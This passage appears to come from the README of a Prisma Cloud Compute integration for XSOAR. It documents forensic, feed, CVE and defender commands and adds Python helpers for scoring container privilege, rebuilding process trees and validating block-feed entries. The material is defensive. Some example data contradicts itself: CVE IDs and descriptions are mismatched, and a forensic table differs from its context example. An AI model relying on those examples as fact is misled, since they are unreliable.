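The container profile carries the facts a reviewer needs to judge blast radius: `hostNetwork` and `hostPid` (shared host namespaces), the `capabilities` block (what Prisma Cloud Compute has concluded the image may do), any cluster-wide Kubernetes role bindings, and which host paths are mounted. The scorer below is an added example for this README, not the integration's own code; it reads the PrismaCloudCompute.ProfileContainer context using the field names in the Context Output table above. `SAMPLE_CONTAINER` is constructed in the page's shape (it adds a Docker-socket mount the page's example does not have), and the weights, thresholds and sensitive-mount list are the author's assumptions for illustration.

```python
"""Score a Prisma Cloud Compute container profile for privilege and exposure (added example)."""
from typing import Dict, List, Tuple

# Exact-match list of mount paths that hand the container the host; assumption.
SENSITIVE_MOUNTS = ("/var/run/docker.sock", "/proc", "/etc", "/root", "/")

# Assumed weights: top-level boolean flags and capabilities.* flags.
FLAG_WEIGHTS = {
    "hostNetwork": (2, "shares the host network namespace"),
    "hostPid": (3, "shares the host PID namespace"),
}
CAPABILITY_WEIGHTS = {
    "ci": (2, "may write binaries to disk and execute them"),
    "sshd": (2, "may run sshd inside the container"),
    "cloudMetadata": (2, "may query the cloud metadata API"),
    "k8s": (1, "may talk to the Kubernetes API server"),
    "proxy": (1, "may listen on any port and fan out connections"),
}

# Constructed sample in the shape of PrismaCloudCompute.ProfileContainer.
SAMPLE_CONTAINER: Dict = {
    "_id": "container123",
    "image": "twistlock/private:defender_21_04_439",
    "state": "active",
    "hostNetwork": True,
    "hostPid": True,
    "capabilities": {"ci": True},
    "k8s": {},
    "filesystem": {
        "static": [
            {"process": "*", "path": "/var/log/audit", "mount": True},
            {"process": "*", "path": "/var/run/docker.sock", "mount": True},
        ],
        "behavioral": [{"process": "/usr/local/bin/defender", "path": "/tmp", "mount": False}],
    },
}


def score_container(profile: Dict) -> Tuple[int, List[str]]:
    """Return (score, reasons) for one container profile; higher means riskier."""
    score = 0
    reasons: List[str] = []

    for field, (weight, why) in FLAG_WEIGHTS.items():
        if profile.get(field):
            score += weight
            reasons.append(f"{field}: {why}")

    caps = profile.get("capabilities") or {}
    for cap, (weight, why) in CAPABILITY_WEIGHTS.items():
        if caps.get(cap):
            score += weight
            reasons.append(f"capabilities.{cap}: {why}")

    # Cluster-wide RBAC is a lateral-movement path out of the namespace.
    k8s = profile.get("k8s") or {}
    if k8s.get("clusterRoles"):
        names = ", ".join(r.get("name", "?") for r in k8s["clusterRoles"])
        score += 2
        reasons.append(f"k8s.clusterRoles: bound cluster-wide ({names})")

    # Both the static (image-derived) and behavioral (observed) filesystem views.
    fs = profile.get("filesystem") or {}
    for kind in ("static", "behavioral"):
        for entry in fs.get(kind) or []:
            if entry.get("mount") and entry.get("path") in SENSITIVE_MOUNTS:
                score += 3
                reasons.append(f"filesystem.{kind}: sensitive mount {entry['path']}")

    # A profile that is not active is still learning or archived; weight is an assumption.
    if profile.get("state") != "active":
        score += 1
        reasons.append(f"state: {profile.get('state')!r} (not active)")

    return score, reasons


def severity(score: int) -> str:
    """Bucket a score; the cut-offs are assumptions to tune per environment."""
    if score >= 8:
        return "high"
    if score >= 4:
        return "medium"
    return "low"


if __name__ == "__main__":
    total, why = score_container(SAMPLE_CONTAINER)
    print(f"{SAMPLE_CONTAINER['_id']}: {severity(total)} ({total})")
    for line in why:
        print("  -", line)
```

Run over the output of the list command with `limit` paging, this gives a sortable view of which profiles deserve a human look first; the `reasons` list is what you would paste into the incident.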

prisma-cloud-compute-profile-container-hosts-list

Get the hosts where a specific container is running.

Base Command

prisma-cloud-compute-profile-container-hosts-list

Requires Role

devSecOps

Input

| Argument Name | Description | Required |
| --- | --- | --- |
| id | Container profile ID. Can be retrieved from the prisma-cloud-compute-profile-container-list command. | Required |
| limit | The maximum number of hosts to return. Must be between 1 and 50. Default is 50. | Optional |
| offset | The offset from which to begin listing hosts of the container. Default is 0. | Optional |

Context Output

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.ProfileContainerHost.containerID | String | The container ID. |
| PrismaCloudCompute.ProfileContainerHost.hostsIDs | String | The list of hosts where this container is running. |

Command Example

!prisma-cloud-compute-profile-container-hosts-list id=container123

Context Example

```json
{
  "PrismaCloudCompute": {
    "ProfileContainerHost": {
      "containerID": "container123",
      "hostsIDs": [
        "host1",
        "host2"
      ]
    }
  }
}
```

Human Readable Output

Hosts

| HostsIDs |
| --- |
| host1, host2 |

prisma-cloud-compute-profile-container-forensic-list

Get runtime forensics data for a specific container on a specific host.

Base Command

prisma-cloud-compute-profile-container-forensic-list

Input

| Argument Name | Description | Required |
| --- | --- | --- |
| id | The container ID. Can be retrieved from the prisma-cloud-compute-profile-container-list command. | Required |
| collections | The collections scoping the query. | Optional |
| hostname | The hostname for which data should be fetched. | Required |
| incident_id | The incident ID, in case the request type is an incident. | Optional |
| limit | The maximum number of forensics data records to return. Must be between 1 and 50. Default is 20. | Optional |
| offset | The offset from which to begin listing records. Default is 0. | Optional |

Context Output

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.ContainerForensic.containerID | String | The container ID. |
| PrismaCloudCompute.ContainerForensic.hostname | String | The hostname. |
| PrismaCloudCompute.ContainerForensic.Forensics.allPorts | Boolean | Whether all listening ports are allowed. |
| PrismaCloudCompute.ContainerForensic.Forensics.attack | String | The event attack type. |
| PrismaCloudCompute.ContainerForensic.Forensics.category | String | The incident category. |
| PrismaCloudCompute.ContainerForensic.Forensics.command | String | The event command. |
| PrismaCloudCompute.ContainerForensic.Forensics.containerId | String | The event container ID. |
| PrismaCloudCompute.ContainerForensic.Forensics.dstIP | String | The destination IP address of the connection. |
| PrismaCloudCompute.ContainerForensic.Forensics.dstPort | String | The destination port. |
| PrismaCloudCompute.ContainerForensic.Forensics.dstProfileID | String | The profile ID of the connection destination. |
| PrismaCloudCompute.ContainerForensic.Forensics.effect | String | The runtime audit effect. |
| PrismaCloudCompute.ContainerForensic.Forensics.listeningStartTime | Date | The port listening start time. |
| PrismaCloudCompute.ContainerForensic.Forensics.message | String | The runtime audit message. |
| PrismaCloudCompute.ContainerForensic.Forensics.networkCollectionType | String | The type of the network collection method. |
| PrismaCloudCompute.ContainerForensic.Forensics.outbound | Boolean | Whether the port is outbound. |
| PrismaCloudCompute.ContainerForensic.Forensics.path | String | The event path. |
| PrismaCloudCompute.ContainerForensic.Forensics.pid | Number | The event process ID. |
| PrismaCloudCompute.ContainerForensic.Forensics.port | Number | The listening port. |
| PrismaCloudCompute.ContainerForensic.Forensics.ppid | Number | The event parent process ID. |
| PrismaCloudCompute.ContainerForensic.Forensics.process | String | The event process description. |
| PrismaCloudCompute.ContainerForensic.Forensics.srcIP | String | The source IP of the connection. |
| PrismaCloudCompute.ContainerForensic.Forensics.srcProfileID | String | The profile ID of the connection source. |
| PrismaCloudCompute.ContainerForensic.Forensics.static | Boolean | Whether the event was added to the profile without behavioral indications. |
| PrismaCloudCompute.ContainerForensic.Forensics.type | String | The event type. |
| PrismaCloudCompute.ContainerForensic.Forensics.timestamp | Date | The event timestamp. |
| PrismaCloudCompute.ContainerForensic.Forensics.user | String | The event user. |

Command Example

!prisma-cloud-compute-profile-container-forensic-list id=container123 hostname=host123 limit=2

Context Example

```json
{
  "PrismaCloudCompute": {
    "ContainerForensic": {
      "Forensics": [
        {
          "containerId": "a6f769dd",
          "timestamp": "December 10, 2021 11:49:50 AM",
          "pid": 1341,
          "listeningStartTime": "January 01, 0001 00:00:00 AM",
          "command": "mongodump --out=/var/lib/twistlock-backup/dump",
          "user": "twistlock",
          "path": "/usr/bin/mongodump",
          "ppid": 15816,
          "type": "Process spawned"
        },
        {
          "containerId": "a6f769dd",
          "timestamp": "December 09, 2021 11:49:22 AM",
          "pid": 20891,
          "listeningStartTime": "January 01, 0001 00:00:00 AM",
          "command": "mongodump --out=/var/lib/twistlock-backup/dump",
          "user": "twistlock",
          "path": "/usr/bin/mongodump",
          "ppid": 15816,
          "type": "Process spawned"
        }
      ],
      "containerID": "container123",
      "hostname": "host123"
    }
  }
}
```

Human Readable Output

Containers forensic report

| Type | Path | User | Pid | ContainerId | Timestamp | Command |
| --- | --- | --- | --- | --- | --- | --- |
| Process spawned | /usr/bin/mongodump | twistlock | 1341 | a6f769dd | December 10, 2021 11:49:50 AM | mongodump --out=/var/lib/twistlock-backup/dump |
| Process spawned | /usr/bin/mongodump | twistlock | 20891 | a6f769dd | December 09, 2021 11:49:22 AM | mongodump --out=/var/lib/twistlock-backup/dump |

prisma-cloud-compute-host-forensic-list

Get forensics on a specific host.

Base Command

prisma-cloud-compute-host-forensic-list

Requires Role

devSecOps

Input

| Argument Name | Description | Required |
| --- | --- | --- |
| id | The host ID. Can be retrieved from the prisma-cloud-compute-profile-host-list command. | Required |
| collections | The collections scoping the query. | Optional |
| incident_id | The incident ID, in case the request type is an incident. | Optional |
| limit | The maximum number of forensics data records to return. Must be between 1 and 50. Default is 20. | Optional |
| offset | The offset from which to begin listing host forensics. Default is 0. | Optional |

Context Output

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.HostForensic.Forensics.app | String | The application associated with the event. |
| PrismaCloudCompute.HostForensic.Forensics.attack | String | The event attack type. |
| PrismaCloudCompute.HostForensic.Forensics.category | String | The incident category. |
| PrismaCloudCompute.HostForensic.Forensics.command | String | The event command. |
| PrismaCloudCompute.HostForensic.Forensics.country | String | The country associated with the event. |
| PrismaCloudCompute.HostForensic.Forensics.effect | String | The runtime audit effect. |
| PrismaCloudCompute.HostForensic.Forensics.interactive | Boolean | Whether the event is interactive. |
| PrismaCloudCompute.HostForensic.Forensics.ip | String | The IP address associated with the event. |
| PrismaCloudCompute.HostForensic.Forensics.listeningStartTime | Date | The listening port start time. |
| PrismaCloudCompute.HostForensic.Forensics.message | String | The runtime audit message. |
| PrismaCloudCompute.HostForensic.Forensics.path | String | The event path. |
| PrismaCloudCompute.HostForensic.Forensics.pid | Number | The event process ID. |
| PrismaCloudCompute.HostForensic.Forensics.port | Number | The listening port. |
| PrismaCloudCompute.HostForensic.Forensics.ppath | String | The event parent path. |
| PrismaCloudCompute.HostForensic.Forensics.ppid | Number | The event parent process ID. |
| PrismaCloudCompute.HostForensic.Forensics.process | String | The event process. |
| PrismaCloudCompute.HostForensic.Forensics.timestamp | Date | The event timestamp. |
| PrismaCloudCompute.HostForensic.Forensics.type | String | The event type. |
| PrismaCloudCompute.HostForensic.Forensics.user | String | The event user. |
| PrismaCloudCompute.HostForensic.hostID | String | The host ID that was analyzed. |

Command Example#

!prisma-cloud-compute-host-forensic-list id=hostname123 limit=3 offset=5

Context Example#

{
"PrismaCloudCompute": {
"HostForensic": {
"Forensics": [
{
"ppath": "/bin/bash",
"timestamp": "December 10, 2021 21:36:03 PM",
"app": "cron",
"pid": 17478,
"listeningStartTime": "January 01, 0001 00:00:00 AM",
"command": "awk { printf $3 \"|\" $2 \"|\" $1 \":\"}",
"user": "cakeagent",
"path": "/usr/bin/gawk",
"ppid": 17475,
"type": "Process spawned",
"interactive": true
},
{
"ppath": "/bin/bash",
"timestamp": "December 10, 2021 21:36:03 PM",
"app": "cron",
"pid": 17477,
"listeningStartTime": "January 01, 0001 00:00:00 AM",
"command": "grep -vE ^Filesystem|tmpfs|cdrom",
"user": "cakeagent",
"path": "/bin/grep",
"ppid": 17475,
"type": "Process spawned",
"interactive": true
},
{
"ppath": "/bin/bash",
"timestamp": "December 10, 2021 21:36:03 PM",
"app": "cron",
"pid": 17476,
"listeningStartTime": "January 01, 0001 00:00:00 AM",
"command": "df -H -P -B G",
"user": "cakeagent",
"path": "/bin/df",
"ppid": 17475,
"type": "Process spawned",
"interactive": true
}
],
"hostID": "hostname123"
}
}
}

Human Readable Output#

Host forensics report#

| Type | Path | User | Pid | Timestamp | Command | App |
| --- | --- | --- | --- | --- | --- | --- |
| Process spawned | /usr/bin/gawk | cakeagent | 17411 | December 10, 2021 21:34:03 PM | awk {gsub("%", "%%", $0);printf $1 "\|" $2 "\|" $3 "\|" $4 "\|" $5 "\|" $6 "\|" $11 ":::"} | cron |
| Process spawned | /bin/ps | cakeagent | 17410 | December 10, 2021 21:34:03 PM | ps aux | cron |
| Process spawned | /bin/grep | cakeagent | 17407 | December 10, 2021 21:34:03 PM | grep -vE ^Filesystem\|tmpfs\|cdrom | cron |
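The forensic records above are flat, but the pid/ppid pairs let an analyst rebuild the process tree and compare what a scheduled job actually ran against what it is expected to run. The following is an added example, not the integration's own code; the sample records are constructed to match the Context Example, and the `allowed` allow-list is an assumption you would fill in per host.

```python
"""Added example, not part of the integration's own code: build a
parent/child view of the PrismaCloudCompute.HostForensic.Forensics
records that !prisma-cloud-compute-host-forensic-list places in context
and flag spawned processes that fall outside an allow-list for their app."""
from collections import defaultdict
from typing import Dict, List, Set

# Constructed sample shaped like the Context Example above: three children
# of the same cron-launched bash (ppid 17475), all run as cakeagent.
SAMPLE_FORENSICS = [
    {"ppath": "/bin/bash", "app": "cron", "pid": 17478, "ppid": 17475,
     "command": 'awk { printf $3 "|" $2 "|" $1 ":"}', "user": "cakeagent",
     "path": "/usr/bin/gawk", "type": "Process spawned", "interactive": True},
    {"ppath": "/bin/bash", "app": "cron", "pid": 17477, "ppid": 17475,
     "command": "grep -vE ^Filesystem|tmpfs|cdrom", "user": "cakeagent",
     "path": "/bin/grep", "type": "Process spawned", "interactive": True},
    {"ppath": "/bin/bash", "app": "cron", "pid": 17476, "ppid": 17475,
     "command": "df -H -P -B G", "user": "cakeagent",
     "path": "/bin/df", "type": "Process spawned", "interactive": True},
]


def build_process_tree(forensics: List[dict]) -> Dict[int, List[dict]]:
    """Group 'Process spawned' records under their parent pid.

    Other record types (listening ports, network events) carry no ppid
    that is meaningful for a tree, so they are skipped.
    """
    tree: Dict[int, List[dict]] = defaultdict(list)
    for rec in forensics:
        if rec.get("type") != "Process spawned" or "ppid" not in rec:
            continue
        tree[int(rec["ppid"])].append(rec)
    return dict(tree)


def lineage(rec: dict) -> str:
    """Render the parent -> child binary path as a single string."""
    return f'{rec.get("ppath", "?")} -> {rec.get("path", "?")}'


def find_unexpected(forensics: List[dict],
                    allowed: Dict[str, Set[str]]) -> List[dict]:
    """Return spawned processes whose binary path is not allow-listed for
    the app (e.g. "cron") that produced them.

    `allowed` maps an app name to the set of binary paths its jobs are
    expected to run on this host (an assumption, filled in per host);
    anything else is returned for review. Apps with no entry are not judged.
    """
    out = []
    for rec in forensics:
        if rec.get("type") != "Process spawned":
            continue
        app = rec.get("app")
        if app in allowed and rec.get("path") not in allowed[app]:
            out.append(rec)
    return out


def summarize_by_user(forensics: List[dict]) -> Dict[str, int]:
    """Count spawned processes per user, a quick check that a job did not
    start running things as an unexpected account."""
    counts: Dict[str, int] = defaultdict(int)
    for rec in forensics:
        if rec.get("type") == "Process spawned":
            counts[rec.get("user", "?")] += 1
    return dict(counts)


if __name__ == "__main__":
    for ppid, children in build_process_tree(SAMPLE_FORENSICS).items():
        print(f"parent pid {ppid}:")
        for child in children:
            print(f"  {child['pid']:>6}  {lineage(child)}  {child['command']}")
    for rec in find_unexpected(SAMPLE_FORENSICS, {"cron": {"/bin/df", "/bin/grep"}}):
        print("review:", rec["pid"], lineage(rec))
```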

prisma-cloud-compute-console-version-info#


Get the console version.

Base Command#

prisma-cloud-compute-console-version-info

Requires Role#

ci

Input#

| Argument Name | Description | Required |
| --- | --- | --- |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.Console.Version | String | The console version. |

Command Example#

!prisma-cloud-compute-console-version-info

Context Example#

{
"PrismaCloudCompute": {
"Console": {
"Version": "21.04.439"
}
}
}

Human Readable Output#

Console version#

| Version |
| --- |
| 21.04.439 |

prisma-cloud-compute-custom-feeds-ip-list#


Get all the blacklisted IP addresses in the system.

Base Command#

prisma-cloud-compute-custom-feeds-ip-list

Requires Role#

auditor

Input#

| Argument Name | Description | Required |
| --- | --- | --- |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.CustomFeedIP.digest | String | An internal digest of the custom IP feed. |
| PrismaCloudCompute.CustomFeedIP.feed | String | The list of blacklisted custom IP addresses. |
| PrismaCloudCompute.CustomFeedIP.modified | Date | The last time the custom feed was modified. |

Command Example#

!prisma-cloud-compute-custom-feeds-ip-list

Context Example#

{
"PrismaCloudCompute": {
"CustomFeedIP": {
"feed": [
"2.2.2.2",
"1.1.1.1"
],
"modified": "December 10, 2021 21:12:32 PM",
"digest": "12345"
}
}
}

Human Readable Output#

IP Feeds#

| Modified | Feed |
| --- | --- |
| December 10, 2021 21:12:32 PM | 2.2.2.2, 1.1.1.1 |

prisma-cloud-compute-custom-feeds-ip-add#


Add a list of banned IP addresses to be blocked by the system.

Base Command#

prisma-cloud-compute-custom-feeds-ip-add

Requires Role#

operator

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| ip | List of custom IP addresses to add to the banned IPs list that will be blocked. For example ip=1.1.1.1,2.2.2.2. | Required |

Context Output#

There is no context output for this command.

Command Example#

!prisma-cloud-compute-custom-feeds-ip-add ip=1.1.1.1,2.2.2.2

Human Readable Output#

Successfully updated the custom IP feeds

prisma-cloud-compute-custom-feeds-malware-list#


List all custom uploaded MD5 malware hashes.

Base Command#

prisma-cloud-compute-custom-feeds-malware-list

Requires Role#

auditor

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| limit | The maximum number of records of custom md5 malwares to return. Default is 50. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.CustomFeedMalware.digest | String | An internal digest of the feed. |
| PrismaCloudCompute.CustomFeedMalware.feed.md5 | String | The md5 sum of the feed. |
| PrismaCloudCompute.CustomFeedMalware.feed.modified | Date | The time the malware was added to the database. |
| PrismaCloudCompute.CustomFeedMalware.feed.name | String | The name of the malware feed. |
| PrismaCloudCompute.CustomFeedMalware.modified | Date | The last time the custom feed was modified. |

Command Example#

!prisma-cloud-compute-custom-feeds-malware-list limit=2

Context Example#

{
"PrismaCloudCompute": {
"CustomFeedMalware": {
"feed": [
{
"md5": "md5_hash1",
"name": "first_md5_hash",
"allowed": false
},
{
"md5": "md5_hash2",
"name": "second_md5_hash",
"allowed": false
}
],
"modified": "December 09, 2021 13:31:38 PM",
"digest": "1234"
}
}
}

Human Readable Output#

Malware Feeds#

| Name | Md5 | Allowed |
| --- | --- | --- |
| first_md5_hash | md5_hash1 | false |
| second_md5_hash | md5_hash2 | false |

prisma-cloud-compute-custom-feeds-malware-add#


Add custom md5 malware hashes.

Base Command#

prisma-cloud-compute-custom-feeds-malware-add

Requires Role#

operator

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| name | The name that will be attached to the md5 records. | Required |
| md5 | Comma-separated list of md5 hashes to be added. | Required |

Context Output#

There is no context output for this command.

Command Example#

!prisma-cloud-compute-custom-feeds-malware-add name=test md5=md5_hash1,md5_hash2,md5_hash3

Human Readable Output#

Successfully updated the custom md5 malware feeds
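Both feed commands take a comma-separated list and, on success, the values go straight into a feed that Defenders enforce, so it pays to validate them first. The following is an added example, not the integration's own code: it checks the `ip` argument of prisma-cloud-compute-custom-feeds-ip-add and the `md5` argument of prisma-cloud-compute-custom-feeds-malware-add, and the sample inputs are constructed.

```python
"""Added example, not the integration's own code: validate the
comma-separated values an analyst passes as the ip argument of
!prisma-cloud-compute-custom-feeds-ip-add and the md5 argument of
!prisma-cloud-compute-custom-feeds-malware-add, so that a typo is caught
before it lands in the custom feed the Defenders enforce."""
import ipaddress
import re
from typing import Dict, List

# A well-formed MD5 digest is exactly 32 hex characters (compared lowercase).
MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def split_csv(arg: str) -> List[str]:
    """Split an XSOAR comma-separated argument, dropping blanks and whitespace."""
    return [item.strip() for item in arg.split(",") if item.strip()]


def validate_ip_feed(arg: str) -> Dict[str, List[str]]:
    """Classify each entry as accepted, non_global (a valid but private,
    loopback or link-local address, which in a block feed usually means a
    typo worth a second look) or rejected (not an IP address at all).
    Duplicates are collapsed and addresses are canonicalised."""
    result: Dict[str, List[str]] = {"accepted": [], "non_global": [], "rejected": []}
    seen = set()
    for item in split_csv(arg):
        try:
            addr = ipaddress.ip_address(item)
        except ValueError:
            result["rejected"].append(item)
            continue
        canonical = str(addr)
        if canonical in seen:
            continue
        seen.add(canonical)
        result["accepted" if addr.is_global else "non_global"].append(canonical)
    return result


def validate_md5_feed(arg: str) -> Dict[str, List[str]]:
    """Normalise hashes to lowercase and keep only well-formed MD5 digests;
    placeholder values like the md5_hash1 used in the examples on this page
    are rejected. Duplicates are collapsed."""
    result: Dict[str, List[str]] = {"accepted": [], "rejected": []}
    for item in split_csv(arg):
        digest = item.lower()
        if not MD5_RE.match(digest):
            result["rejected"].append(item)
        elif digest not in result["accepted"]:
            result["accepted"].append(digest)
    return result


def build_command(name: str, arg: str, values: List[str], extra: str = "") -> str:
    """Render the validated list back into the command line an analyst or a
    playbook task would run; `extra` carries further arguments such as name=."""
    if not values:
        raise ValueError(f"no valid values for {name} {arg}=")
    prefix = f"!{name} {extra} " if extra else f"!{name} "
    return f"{prefix}{arg}={','.join(values)}"


if __name__ == "__main__":
    # Constructed inputs: one duplicate, one private address, one typo.
    ips = validate_ip_feed("1.1.1.1, 2.2.2.2,1.1.1.1,10.0.0.5,999.1.1.1")
    print(ips)
    print(build_command("prisma-cloud-compute-custom-feeds-ip-add", "ip", ips["accepted"]))
    # Constructed inputs: an uppercase digest (from the image scan example
    # later on this page) and the page's placeholder string.
    hashes = validate_md5_feed("DC8C57A9674D54DA18637FFEA29EEABA,md5_hash1")
    print(hashes)
    print(build_command("prisma-cloud-compute-custom-feeds-malware-add", "md5",
                        hashes["accepted"], extra="name=test"))
```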

cve#


Get information about the CVEs in the system. Will return a maximum of 50 records. It is possible to query for a partial CVE description such as cve-2020 or cve-2014 or by severity/distro/package.

Base Command#

cve

Requires Role#

devOps

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| cve | Comma-separated list of CVEs, for example, cve=cve-2016-223,cve-2020-3546. | Required |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| CVE.ID | String | The ID of the CVE, for example: CVE-2015-1653 |
| CVE.CVSS | String | The CVSS of the CVE, for example: 10.0 |
| CVE.Modified | Date | The timestamp of when the CVE was last modified. |
| CVE.Description | String | A description of the CVE. |
| DBotScore.Indicator | String | The indicator value. |
| DBotScore.Score | Number | The indicator score. |
| DBotScore.Type | String | The indicator type. |
| DBotScore.Vendor | String | The vendor reporting the score of the indicator. |
| DBotScore.Reliability | String | Reliability of the source providing the intelligence data. |

Command Example#

!cve cve=CVE-2021-4333

Context Example#

{
"DBotScore": [
{
"Vendor": "PaloAltoNetworks_PrismaCloudCompute",
"Indicator": "CVE-2021-43332",
"Score": 0,
"Type": "cve"
},
{
"Vendor": "PaloAltoNetworks_PrismaCloudCompute",
"Indicator": "CVE-2021-43337",
"Score": 0,
"Type": "cve"
}
],
"CVE": [
{
"ID": "CVE-2021-43331",
"CVSS": 6.1,
"Modified": "November 17, 2021 16:40:14 PM",
"Description": "In GNU Mailman before 2.1.36, a crafted URL to the Cgi/options.py user options page can execute arbitrary JavaScript for XSS."
},
{
"ID": "CVE-2021-43337",
"CVSS": 6.5,
"Modified": "November 18, 2021 08:40:01 AM",
"Description": "SchedMD Slurm 21.08.* before 21.08.4 has Incorrect Access Control. On sites using the new AccountingStoreFlags=job_script and/or job_env options, the access control rules in SlurmDBD may permit users to request job scripts and environment files to which they should not have access."
}
]
}

Human Readable Output#

CVE-2021-43332#

| CVSS | Description | ID | Modified |
| --- | --- | --- | --- |
| 6.1 | In GNU Mailman before 2.1.36, the CSRF token for the Cgi/admindb.py admindb page contains an encrypted version of the list admin password. This could potentially be cracked by a moderator via an offline brute-force attack. | CVE-2021-43332 | November 19, 2021 08:40:01 AM |

CVE-2021-43337#

| CVSS | Description | ID | Modified |
| --- | --- | --- | --- |
| 6.5 | SchedMD Slurm 21.08.* before 21.08.4 has Incorrect Access Control. On sites using the new AccountingStoreFlags=job_script and/or job_env options, the access control rules in SlurmDBD may permit users to request job scripts and environment files to which they should not have access. | CVE-2021-43337 | November 18, 2021 08:40:01 AM |

prisma-cloud-compute-defenders-list#


Retrieve a list of defenders and their information.

Base Command#

prisma-cloud-compute-defenders-list

Requires Role#

vulnerabilityManager

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| cluster | The cluster name by which to scope the query. | Optional |
| hostname | Name of a specific defender to retrieve. Can be retrieved from !prisma-cloud-compute-profile-host-list. | Optional |
| type | Indicates the defender types to return (e.g., docker, dockerWindows, cri, etc). | Optional |
| connected | Indicates whether to return only connected defenders (true) or disconnected defenders (false). Possible values are: true, false. | Optional |
| limit | The maximum number of defender records to return. Default is 20. | Optional |
| offset | The offset number by which to begin listing defenders and their information. Default is 0. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.DefenderDetails.category | String | The category of the defender type (host/container/serverless). Range of acceptable values: container, host, serverless, appEmbedded. |
| PrismaCloudCompute.DefenderDetails.certificateExpiration | Date | The client's certificate expiry time. |
| PrismaCloudCompute.DefenderDetails.cloudMetadata | Unknown | The cloud provider metadata of the host. |
| PrismaCloudCompute.DefenderDetails.cluster | String | The provided cluster name. (Fallback is internal IP address.) |
| PrismaCloudCompute.DefenderDetails.clusterID | String | The unique ID generated for each daemon set and used to group defenders by clusters. Note - Kubernetes does not provide a cluster name as part of its API. |
| PrismaCloudCompute.DefenderDetails.compatibleVersion | Boolean | Whether the defender has a compatible version for communication (e.g. request logs). |
| PrismaCloudCompute.DefenderDetails.connected | Boolean | Whether the defender is connected. |
| PrismaCloudCompute.DefenderDetails.features | Unknown | The features that are enabled in the defender, such as listener type. |
| PrismaCloudCompute.DefenderDetails.firewallProtection | Unknown | The firewall protection status of app embedded defenders. |
| PrismaCloudCompute.DefenderDetails.fqdn | String | The fully qualified domain name used in audit alerts to identify specific hosts. |
| PrismaCloudCompute.DefenderDetails.hostname | String | The defender hostname. |
| PrismaCloudCompute.DefenderDetails.lastModified | Date | The last time the defender connectivity was modified. |
| PrismaCloudCompute.DefenderDetails.port | Number | The communication port between the defender and the console. |
| PrismaCloudCompute.DefenderDetails.proxy | Unknown | The proxy options of the defender. |
| PrismaCloudCompute.DefenderDetails.remoteLoggingSupported | Boolean | Whether the defender logs can be retrieved remotely. |
| PrismaCloudCompute.DefenderDetails.remoteMgmtSupported | Boolean | Whether the defender can be remotely managed (upgrade, restart). |
| PrismaCloudCompute.DefenderDetails.status | Unknown | The feature status of the defender. |
| PrismaCloudCompute.DefenderDetails.systemInfo | Unknown | The system information of the defender host. |
| PrismaCloudCompute.DefenderDetails.tasClusterID | String | The ID used to identify the TAS cluster of the defender. Typically will be the cloud controller API address. |
| PrismaCloudCompute.DefenderDetails.type | String | The type of the defender (registry scanner/kubernetes node/etc...). |
| PrismaCloudCompute.DefenderDetails.version | String | The agent version. |

Command Example#

!prisma-cloud-compute-defenders-list connected=true limit=1

Context Example#

{
"PrismaCloudCompute": {
"DefenderDetails": {
"category": "container",
"cloudMetadata": {
"resourceID": "123",
"image": "image name",
"provider": "aws",
"type": "c5.xlarge",
"region": "aws region",
"accountID": "1234"
},
"hostname": "host1",
"features": {
"proxyListenerType": "none"
},
"compatibleVersion": true,
"lastModified": "September 02, 2021 11:05:08 AM",
"firewallProtection": {
"supported": false,
"enabled": false
},
"fqdn": "host1.lab.com",
"remoteMgmtSupported": true,
"status": {
"container": {
"scanTime": "2021-12-13T11:05:14.178Z",
"completed": true
},
"features": {
"err": ""
},
"process": {
"enabled": true,
"err": ""
},
"lastModified": "0001-01-01T00:00:00Z",
"appFirewall": {
"enabled": true,
"err": ""
},
"hostNetworkFirewall": {
"enabled": true,
"err": ""
},
"hostCustomCompliance": {
"err": ""
},
"filesystem": {
"enabled": true,
"err": ""
},
"runtime": {
"enabled": true,
"err": ""
},
"image": {
"scanTime": "2021-12-13T14:19:36.09Z",
"completed": true
},
"containerNetworkFirewall": {
"enabled": true,
"err": ""
},
"network": {
"enabled": true,
"err": ""
}
},
"version": "21.04.439",
"collections": [
"All",
"123"
],
"proxy": {
"httpProxy": "",
"ca": "",
"password": {
"encrypted": ""
},
"noProxy": "",
"user": ""
},
"systemInfo": {
"kernelVersion": "4.14.123-111.109.amzn2.x86_64",
"totalDiskSpaceGB": 199,
"cpuCount": 4,
"freeDiskSpaceGB": 180,
"memoryGB": 7.446006774902344
},
"connected": true,
"remoteLoggingSupported": true,
"type": "docker",
"port": 8084,
"certificateExpiration": "2024-09-01T11:00:00Z"
}
}
}

Human Readable Output#

Defenders Information#

| Hostname | Version | Status | Listener |
| --- | --- | --- | --- |
| host1 | 21.04.439 | Connected since September 02, 2021 11:05:08 AM | none |
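The human-readable table only shows connectivity, but the context record also carries compatibleVersion, version and certificateExpiration, which is what a fleet health check needs. The following is an added example, not the integration's own code; the defender records are constructed from the Context Example (host2 is invented), the console version is the one prisma-cloud-compute-console-version-info returned above, and the 30-day certificate warning window is an assumed policy.

```python
"""Added example, not the integration's own code: a health check over the
PrismaCloudCompute.DefenderDetails records that
!prisma-cloud-compute-defenders-list puts in context. It flags defenders
that are disconnected, reported incompatible with the console, running a
different version than the console, or whose client certificate is about
to expire, so they can be queued for upgrade or re-enrolment."""
from datetime import datetime
from typing import Dict, List

# Constructed sample trimmed from the Context Example above; host2 is a
# second, invented defender that is currently disconnected.
SAMPLE_DEFENDERS = [
    {"hostname": "host1", "connected": True, "compatibleVersion": True,
     "version": "21.04.439", "certificateExpiration": "2024-09-01T11:00:00Z"},
    {"hostname": "host2", "connected": False, "compatibleVersion": True,
     "version": "21.04.439", "certificateExpiration": "2025-01-01T00:00:00Z"},
]


def parse_utc(stamp: str) -> datetime:
    """Parse the ISO-8601 'Z' timestamps used by certificateExpiration."""
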